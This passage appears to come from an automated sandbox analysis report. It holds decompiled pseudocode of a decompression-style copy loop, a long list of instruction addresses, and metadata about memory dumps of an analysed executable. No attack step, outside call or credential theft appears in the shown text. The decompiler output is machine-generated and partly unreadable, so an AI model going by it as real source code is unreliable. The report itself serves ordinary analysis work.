							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                                                          0x00406035
                                                                                                                          0x0040603c
                                                                                                                          0x00406042
                                                                                                                          0x00406048
                                                                                                                          0x00000000
                                                                                                                          0x0040604c
                                                                                                                          0x00406058
                                                                                                                          0x00406058
                                                                                                                          0x00406058
                                                                                                                          0x00406061
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406067
                                                                                                                          0x00000000
                                                                                                                          0x0040606e
                                                                                                                          0x00406072
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040607b
                                                                                                                          0x0040607e
                                                                                                                          0x00406081
                                                                                                                          0x00406083
                                                                                                                          0x00406085
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040608b
                                                                                                                          0x0040608e
                                                                                                                          0x00406090
                                                                                                                          0x00406091
                                                                                                                          0x00406094
                                                                                                                          0x00406096
                                                                                                                          0x00406097
                                                                                                                          0x00406099
                                                                                                                          0x0040609c
                                                                                                                          0x004060a1
                                                                                                                          0x004060a6
                                                                                                                          0x004060af
                                                                                                                          0x004060c2
                                                                                                                          0x004060c5
                                                                                                                          0x004060ce
                                                                                                                          0x004060d1
                                                                                                                          0x004060f9
                                                                                                                          0x004060f9
                                                                                                                          0x004060fb
                                                                                                                          0x00406109
                                                                                                                          0x00406109
                                                                                                                          0x0040610d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004060fd
                                                                                                                          0x004060fd
                                                                                                                          0x00406100
                                                                                                                          0x00406100
                                                                                                                          0x00406101
                                                                                                                          0x00406101
                                                                                                                          0x00000000
                                                                                                                          0x004060fd
                                                                                                                          0x004060d3
                                                                                                                          0x004060d7
                                                                                                                          0x004060dc
                                                                                                                          0x004060dc
                                                                                                                          0x004060e5
                                                                                                                          0x004060eb
                                                                                                                          0x004060ed
                                                                                                                          0x004060f0
                                                                                                                          0x00000000
                                                                                                                          0x004060f6
                                                                                                                          0x004060f6
                                                                                                                          0x00000000
                                                                                                                          0x004060f6
                                                                                                                          0x00000000
                                                                                                                          0x00406113
                                                                                                                          0x00406113
                                                                                                                          0x00406117
                                                                                                                          0x004069c3
                                                                                                                          0x00000000
                                                                                                                          0x004069c3
                                                                                                                          0x00406120
                                                                                                                          0x00406130
                                                                                                                          0x00406133
                                                                                                                          0x00406136
                                                                                                                          0x00406136
                                                                                                                          0x00406136
                                                                                                                          0x00406139
                                                                                                                          0x00406139
                                                                                                                          0x0040613d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040613f
                                                                                                                          0x00406142
                                                                                                                          0x00406145
                                                                                                                          0x0040616f
                                                                                                                          0x00406175
                                                                                                                          0x0040617c
                                                                                                                          0x00000000
                                                                                                                          0x0040617c
                                                                                                                          0x00406147
                                                                                                                          0x0040614b
                                                                                                                          0x0040614e
                                                                                                                          0x00406153
                                                                                                                          0x00406153
                                                                                                                          0x0040615e
                                                                                                                          0x00406164
                                                                                                                          0x00406166
                                                                                                                          0x00406169
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061ae
                                                                                                                          0x004061b4
                                                                                                                          0x004061b7
                                                                                                                          0x004061c4
                                                                                                                          0x004061cc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406187
                                                                                                                          0x004069d2
                                                                                                                          0x00000000
                                                                                                                          0x004069d2
                                                                                                                          0x00406193
                                                                                                                          0x0040619e
                                                                                                                          0x0040619e
                                                                                                                          0x0040619e
                                                                                                                          0x004061a1
                                                                                                                          0x004061a4
                                                                                                                          0x004061a7
                                                                                                                          0x004061aa
                                                                                                                          0x004061ac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00406849
                                                                                                                          0x0040684f
                                                                                                                          0x00406852
                                                                                                                          0x00406855
                                                                                                                          0x0040686f
                                                                                                                          0x00406872
                                                                                                                          0x00406878
                                                                                                                          0x00406883
                                                                                                                          0x00406883
                                                                                                                          0x00406885
                                                                                                                          0x00406857
                                                                                                                          0x00406857
                                                                                                                          0x00406866
                                                                                                                          0x0040686a
                                                                                                                          0x0040686a
                                                                                                                          0x00406888
                                                                                                                          0x0040688f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406891
                                                                                                                          0x00406891
                                                                                                                          0x00406895
                                                                                                                          0x00406a44
                                                                                                                          0x00000000
                                                                                                                          0x00406a44
                                                                                                                          0x004068a1
                                                                                                                          0x004068a8
                                                                                                                          0x004068b0
                                                                                                                          0x004068b0
                                                                                                                          0x004068b0
                                                                                                                          0x004068b3
                                                                                                                          0x004068b6
                                                                                                                          0x004068b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061d4
                                                                                                                          0x004061d6
                                                                                                                          0x004061d9
                                                                                                                          0x0040624a
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406257
                                                                                                                          0x00406261
                                                                                                                          0x00000000
                                                                                                                          0x00406261
                                                                                                                          0x004061db
                                                                                                                          0x004061df
                                                                                                                          0x004061e2
                                                                                                                          0x004061e4
                                                                                                                          0x004061e7
                                                                                                                          0x004061ea
                                                                                                                          0x004061ec
                                                                                                                          0x004061ef
                                                                                                                          0x004061f1
                                                                                                                          0x004061f6
                                                                                                                          0x004061f9
                                                                                                                          0x004061fc
                                                                                                                          0x00406200
                                                                                                                          0x00406207
                                                                                                                          0x0040620a
                                                                                                                          0x00406211
                                                                                                                          0x00406215
                                                                                                                          0x0040621d
                                                                                                                          0x0040621d
                                                                                                                          0x0040621d
                                                                                                                          0x00406217
                                                                                                                          0x00406217
                                                                                                                          0x00406217
                                                                                                                          0x0040620c
                                                                                                                          0x0040620c
                                                                                                                          0x0040620c
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406242
                                                                                                                          0x00406244
                                                                                                                          0x00000000
                                                                                                                          0x00406244
                                                                                                                          0x00406226
                                                                                                                          0x00406229
                                                                                                                          0x0040622c
                                                                                                                          0x0040622f
                                                                                                                          0x00406231
                                                                                                                          0x00406231
                                                                                                                          0x00406231
                                                                                                                          0x00406234
                                                                                                                          0x00406237
                                                                                                                          0x00406239
                                                                                                                          0x0040623a
                                                                                                                          0x0040623d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406473
                                                                                                                          0x00406477
                                                                                                                          0x00406495
                                                                                                                          0x00406498
                                                                                                                          0x0040649f
                                                                                                                          0x004064a2
                                                                                                                          0x004064a5
                                                                                                                          0x004064a8
                                                                                                                          0x004064ab
                                                                                                                          0x004064ae
                                                                                                                          0x004064b0
                                                                                                                          0x004064b7
                                                                                                                          0x004064b8
                                                                                                                          0x004064ba
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c3
                                                                                                                          0x004064c3
                                                                                                                          0x004064c8
                                                                                                                          0x00000000
                                                                                                                          0x004064c8
                                                                                                                          0x00406479
                                                                                                                          0x0040647c
                                                                                                                          0x0040647f
                                                                                                                          0x00406489
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064dd
                                                                                                                          0x004064e1
                                                                                                                          0x00406504
                                                                                                                          0x00406507
                                                                                                                          0x0040650a
                                                                                                                          0x00406514
                                                                                                                          0x004064e3
                                                                                                                          0x004064e3
                                                                                                                          0x004064e6
                                                                                                                          0x004064e9
                                                                                                                          0x004064ec
                                                                                                                          0x004064f9
                                                                                                                          0x004064fc
                                                                                                                          0x004064fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406520
                                                                                                                          0x00406524
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040652a
                                                                                                                          0x0040652e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406534
                                                                                                                          0x00406536
                                                                                                                          0x0040653a
                                                                                                                          0x0040653a
                                                                                                                          0x0040653d
                                                                                                                          0x00406541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406591
                                                                                                                          0x00406595
                                                                                                                          0x0040659c
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065ac
                                                                                                                          0x00000000
                                                                                                                          0x004065ac
                                                                                                                          0x00406597
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065c3
                                                                                                                          0x004065c6
                                                                                                                          0x004065c9
                                                                                                                          0x004065be
                                                                                                                          0x004065be
                                                                                                                          0x004065be
                                                                                                                          0x004065cc
                                                                                                                          0x004065cf
                                                                                                                          0x004065d2
                                                                                                                          0x004065d2
                                                                                                                          0x004065d5
                                                                                                                          0x004065d8
                                                                                                                          0x004065db
                                                                                                                          0x004065db
                                                                                                                          0x004065de
                                                                                                                          0x004065e5
                                                                                                                          0x004065ea
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406678
                                                                                                                          0x00406678
                                                                                                                          0x0040667c
                                                                                                                          0x00406a1a
                                                                                                                          0x00000000
                                                                                                                          0x00406a1a
                                                                                                                          0x00406682
                                                                                                                          0x00406685
                                                                                                                          0x00406688
                                                                                                                          0x0040668c
                                                                                                                          0x0040668f
                                                                                                                          0x00406695
                                                                                                                          0x00406697
                                                                                                                          0x00406697
                                                                                                                          0x00406697
                                                                                                                          0x0040669a
                                                                                                                          0x0040669d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040626d
                                                                                                                          0x0040626d
                                                                                                                          0x00406271
                                                                                                                          0x004069de
                                                                                                                          0x00000000
                                                                                                                          0x004069de
                                                                                                                          0x00406277
                                                                                                                          0x0040627a
                                                                                                                          0x0040627d
                                                                                                                          0x00406281
                                                                                                                          0x00406284
                                                                                                                          0x0040628a
                                                                                                                          0x0040628c
                                                                                                                          0x0040628c
                                                                                                                          0x0040628c
                                                                                                                          0x0040628f
                                                                                                                          0x00406292
                                                                                                                          0x00406292
                                                                                                                          0x00406295
                                                                                                                          0x00406298
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629e
                                                                                                                          0x004062a4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062aa
                                                                                                                          0x004062aa
                                                                                                                          0x004062ae
                                                                                                                          0x004062b1
                                                                                                                          0x004062b4
                                                                                                                          0x004062b7
                                                                                                                          0x004062ba
                                                                                                                          0x004062bb
                                                                                                                          0x004062be
                                                                                                                          0x004062c0
                                                                                                                          0x004062c6
                                                                                                                          0x004062c9
                                                                                                                          0x004062cc
                                                                                                                          0x004062cf
                                                                                                                          0x004062d2
                                                                                                                          0x004062d5
                                                                                                                          0x004062d8
                                                                                                                          0x004062f4
                                                                                                                          0x004062f7
                                                                                                                          0x004062fa
                                                                                                                          0x004062fd
                                                                                                                          0x00406304
                                                                                                                          0x00406308
                                                                                                                          0x0040630a
                                                                                                                          0x0040630e
                                                                                                                          0x004062da
                                                                                                                          0x004062da
                                                                                                                          0x004062de
                                                                                                                          0x004062e6
                                                                                                                          0x004062eb
                                                                                                                          0x004062ed
                                                                                                                          0x004062ef
                                                                                                                          0x004062ef
                                                                                                                          0x00406311
                                                                                                                          0x00406318
                                                                                                                          0x0040631b
                                                                                                                          0x00000000
                                                                                                                          0x00406321
                                                                                                                          0x00000000
                                                                                                                          0x00406321
                                                                                                                          0x00000000
                                                                                                                          0x00406326
                                                                                                                          0x00406326
                                                                                                                          0x0040632a
                                                                                                                          0x004069ea
                                                                                                                          0x00000000
                                                                                                                          0x004069ea
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x0040633a
                                                                                                                          0x0040633d
                                                                                                                          0x00406343
                                                                                                                          0x00406345
                                                                                                                          0x00406345
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634b
                                                                                                                          0x0040634b
                                                                                                                          0x00406351
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406353
                                                                                                                          0x00406356
                                                                                                                          0x00406359
                                                                                                                          0x0040635c
                                                                                                                          0x0040635f
                                                                                                                          0x00406362
                                                                                                                          0x00406365
                                                                                                                          0x00406368
                                                                                                                          0x0040636b
                                                                                                                          0x0040636e
                                                                                                                          0x00406371
                                                                                                                          0x00406389
                                                                                                                          0x0040638c
                                                                                                                          0x0040638f
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406395
                                                                                                                          0x00406399
                                                                                                                          0x0040639b
                                                                                                                          0x00406373
                                                                                                                          0x00406373
                                                                                                                          0x0040637b
                                                                                                                          0x00406380
                                                                                                                          0x00406382
                                                                                                                          0x00406384
                                                                                                                          0x00406384
                                                                                                                          0x0040639e
                                                                                                                          0x004063a5
                                                                                                                          0x004063a8
                                                                                                                          0x00000000
                                                                                                                          0x004063aa
                                                                                                                          0x00000000
                                                                                                                          0x004063aa
                                                                                                                          0x004063a8
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063ea
                                                                                                                          0x004063ea
                                                                                                                          0x004063ee
                                                                                                                          0x004069f6
                                                                                                                          0x00000000
                                                                                                                          0x004069f6
                                                                                                                          0x004063f4
                                                                                                                          0x004063f7
                                                                                                                          0x004063fa
                                                                                                                          0x004063fe
                                                                                                                          0x00406401
                                                                                                                          0x00406407
                                                                                                                          0x00406409
                                                                                                                          0x00406409
                                                                                                                          0x00406409
                                                                                                                          0x0040640c
                                                                                                                          0x0040640f
                                                                                                                          0x0040640f
                                                                                                                          0x00406415
                                                                                                                          0x004063b3
                                                                                                                          0x004063b3
                                                                                                                          0x004063b6
                                                                                                                          0x00000000
                                                                                                                          0x004063b6
                                                                                                                          0x00406417
                                                                                                                          0x00406417
                                                                                                                          0x0040641a
                                                                                                                          0x0040641d
                                                                                                                          0x00406420
                                                                                                                          0x00406423
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642c
                                                                                                                          0x0040642f
                                                                                                                          0x00406432
                                                                                                                          0x00406435
                                                                                                                          0x0040644d
                                                                                                                          0x00406450
                                                                                                                          0x00406453
                                                                                                                          0x00406456
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645d
                                                                                                                          0x0040645f
                                                                                                                          0x00406437
                                                                                                                          0x00406437
                                                                                                                          0x0040643f
                                                                                                                          0x00406444
                                                                                                                          0x00406446
                                                                                                                          0x00406448
                                                                                                                          0x00406448
                                                                                                                          0x00406462
                                                                                                                          0x00406469
                                                                                                                          0x0040646c
                                                                                                                          0x00000000
                                                                                                                          0x0040646e
                                                                                                                          0x00000000
                                                                                                                          0x0040646e
                                                                                                                          0x00000000
                                                                                                                          0x004066fb
                                                                                                                          0x004066fb
                                                                                                                          0x004066ff
                                                                                                                          0x00406a26
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406705
                                                                                                                          0x00406708
                                                                                                                          0x0040670b
                                                                                                                          0x0040670f
                                                                                                                          0x00406712
                                                                                                                          0x00406718
                                                                                                                          0x0040671a
                                                                                                                          0x0040671a
                                                                                                                          0x0040671a
                                                                                                                          0x0040671d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064cb
                                                                                                                          0x004064cb
                                                                                                                          0x004064ce
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040680a
                                                                                                                          0x0040680e
                                                                                                                          0x00406830
                                                                                                                          0x00406833
                                                                                                                          0x0040683d
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406840
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406817
                                                                                                                          0x0040681a
                                                                                                                          0x0040681a
                                                                                                                          0x0040681d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004068c7
                                                                                                                          0x004068cb
                                                                                                                          0x004068e9
                                                                                                                          0x004068e9
                                                                                                                          0x004068e9
                                                                                                                          0x004068f0
                                                                                                                          0x004068f7
                                                                                                                          0x004068fe
                                                                                                                          0x004068fe
                                                                                                                          0x00000000
                                                                                                                          0x004068fe
                                                                                                                          0x004068cd
                                                                                                                          0x004068d0
                                                                                                                          0x004068d3
                                                                                                                          0x004068d6
                                                                                                                          0x004068dd
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069b8
                                                                                                                          0x004069bb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065f2
                                                                                                                          0x004065f4
                                                                                                                          0x004065fb
                                                                                                                          0x004065fc
                                                                                                                          0x004065fe
                                                                                                                          0x00406601
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406609
                                                                                                                          0x0040660c
                                                                                                                          0x0040660f
                                                                                                                          0x00406611
                                                                                                                          0x00406613
                                                                                                                          0x00406613
                                                                                                                          0x00406614
                                                                                                                          0x00406617
                                                                                                                          0x0040661e
                                                                                                                          0x00406621
                                                                                                                          0x0040662f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406905
                                                                                                                          0x00406905
                                                                                                                          0x00406908
                                                                                                                          0x0040690f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406914
                                                                                                                          0x00406914
                                                                                                                          0x00406918
                                                                                                                          0x00406a50
                                                                                                                          0x00000000
                                                                                                                          0x00406a50
                                                                                                                          0x0040691e
                                                                                                                          0x00406921
                                                                                                                          0x00406924
                                                                                                                          0x00406928
                                                                                                                          0x0040692b
                                                                                                                          0x00406931
                                                                                                                          0x00406933
                                                                                                                          0x00406933
                                                                                                                          0x00406933
                                                                                                                          0x00406936
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x0040693c
                                                                                                                          0x0040693c
                                                                                                                          0x00406940
                                                                                                                          0x004069a0
                                                                                                                          0x004069a3
                                                                                                                          0x004069a8
                                                                                                                          0x004069a9
                                                                                                                          0x004069ab
                                                                                                                          0x004069ad
                                                                                                                          0x004069b0
                                                                                                                          0x004068bc
                                                                                                                          0x004068bc
                                                                                                                          0x00000000
                                                                                                                          0x004068bc
                                                                                                                          0x00406942
                                                                                                                          0x00406948
                                                                                                                          0x0040694b
                                                                                                                          0x0040694e
                                                                                                                          0x00406951
                                                                                                                          0x00406954
                                                                                                                          0x00406957
                                                                                                                          0x0040695a
                                                                                                                          0x0040695d
                                                                                                                          0x00406960
                                                                                                                          0x00406963
                                                                                                                          0x0040697c
                                                                                                                          0x0040697f
                                                                                                                          0x00406982
                                                                                                                          0x00406985
                                                                                                                          0x00406989
                                                                                                                          0x0040698b
                                                                                                                          0x0040698b
                                                                                                                          0x0040698c
                                                                                                                          0x0040698f
                                                                                                                          0x00406965
                                                                                                                          0x00406965
                                                                                                                          0x0040696d
                                                                                                                          0x00406972
                                                                                                                          0x00406974
                                                                                                                          0x00406977
                                                                                                                          0x00406977
                                                                                                                          0x00406992
                                                                                                                          0x00406999
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x00406637
                                                                                                                          0x0040663a
                                                                                                                          0x00406670
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a3
                                                                                                                          0x004067a3
                                                                                                                          0x004067a6
                                                                                                                          0x004067a8
                                                                                                                          0x00406a32
                                                                                                                          0x00000000
                                                                                                                          0x00406a32
                                                                                                                          0x004067ae
                                                                                                                          0x004067b1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067b7
                                                                                                                          0x004067bb
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x0040663c
                                                                                                                          0x0040663e
                                                                                                                          0x00406640
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406646
                                                                                                                          0x00406648
                                                                                                                          0x0040664a
                                                                                                                          0x0040664d
                                                                                                                          0x00406650
                                                                                                                          0x00406666
                                                                                                                          0x0040666b
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x004066d3
                                                                                                                          0x004066d5
                                                                                                                          0x004066dc
                                                                                                                          0x004066df
                                                                                                                          0x004066e2
                                                                                                                          0x004066e2
                                                                                                                          0x004066e7
                                                                                                                          0x004066e7
                                                                                                                          0x004066e9
                                                                                                                          0x004066ec
                                                                                                                          0x004066f3
                                                                                                                          0x004066f6
                                                                                                                          0x00406723
                                                                                                                          0x00406723
                                                                                                                          0x00406726
                                                                                                                          0x00406729
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679d
                                                                                                                          0x0040672b
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406740
                                                                                                                          0x00406743
                                                                                                                          0x00406746
                                                                                                                          0x00406749
                                                                                                                          0x0040674c
                                                                                                                          0x00406765
                                                                                                                          0x00406767
                                                                                                                          0x0040676a
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406773
                                                                                                                          0x00406775
                                                                                                                          0x00406777
                                                                                                                          0x0040677a
                                                                                                                          0x0040677c
                                                                                                                          0x0040677f
                                                                                                                          0x00406783
                                                                                                                          0x00406785
                                                                                                                          0x00406785
                                                                                                                          0x00406786
                                                                                                                          0x00406789
                                                                                                                          0x0040678c
                                                                                                                          0x0040674e
                                                                                                                          0x0040674e
                                                                                                                          0x00406756
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00406760
                                                                                                                          0x0040678f
                                                                                                                          0x00406796
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00406796
                                                                                                                          0x004066a9
                                                                                                                          0x004066ac
                                                                                                                          0x004066ae
                                                                                                                          0x004066b1
                                                                                                                          0x004066b4
                                                                                                                          0x004066b7
                                                                                                                          0x004066b9
                                                                                                                          0x004066bc
                                                                                                                          0x004066bf
                                                                                                                          0x004066bf
                                                                                                                          0x004066c2
                                                                                                                          0x004066c2
                                                                                                                          0x004066c5
                                                                                                                          0x004066cc
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x004066cc
                                                                                                                          0x00406652
                                                                                                                          0x00406655
                                                                                                                          0x00406657
                                                                                                                          0x0040665a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063b9
                                                                                                                          0x004063b9
                                                                                                                          0x004063bd
                                                                                                                          0x00406a02
                                                                                                                          0x00000000
                                                                                                                          0x00406a02
                                                                                                                          0x004063c3
                                                                                                                          0x004063c6
                                                                                                                          0x004063c9
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x004063d7
                                                                                                                          0x004063da
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406544
                                                                                                                          0x00406544
                                                                                                                          0x00406548
                                                                                                                          0x00406a0e
                                                                                                                          0x00000000
                                                                                                                          0x00406a0e
                                                                                                                          0x0040654e
                                                                                                                          0x00406551
                                                                                                                          0x00406554
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655c
                                                                                                                          0x0040655f
                                                                                                                          0x00406562
                                                                                                                          0x00406565
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656c
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406571
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657d
                                                                                                                          0x0040657f
                                                                                                                          0x0040657f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067cb
                                                                                                                          0x004067ce
                                                                                                                          0x004067d1
                                                                                                                          0x004067d4
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d9
                                                                                                                          0x004067dc
                                                                                                                          0x004067df
                                                                                                                          0x004067e2
                                                                                                                          0x004067e5
                                                                                                                          0x004067e8
                                                                                                                          0x004067e9
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f1
                                                                                                                          0x004067f4
                                                                                                                          0x004067f7
                                                                                                                          0x004067fa
                                                                                                                          0x004067fe
                                                                                                                          0x00406800
                                                                                                                          0x00406803
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00406582
                                                                                                                          0x00406582
                                                                                                                          0x00000000
                                                                                                                          0x00406582
                                                                                                                          0x00406803
                                                                                                                          0x00406a38
                                                                                                                          0x00406a5a
                                                                                                                          0x00406a60
                                                                                                                          0x00406a62
                                                                                                                          0x00406a69
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406067
                                                                                                                          0x00406a6f
                                                                                                                          0x00406a6f
                                                                                                                          0x00000000

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                                                                          • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
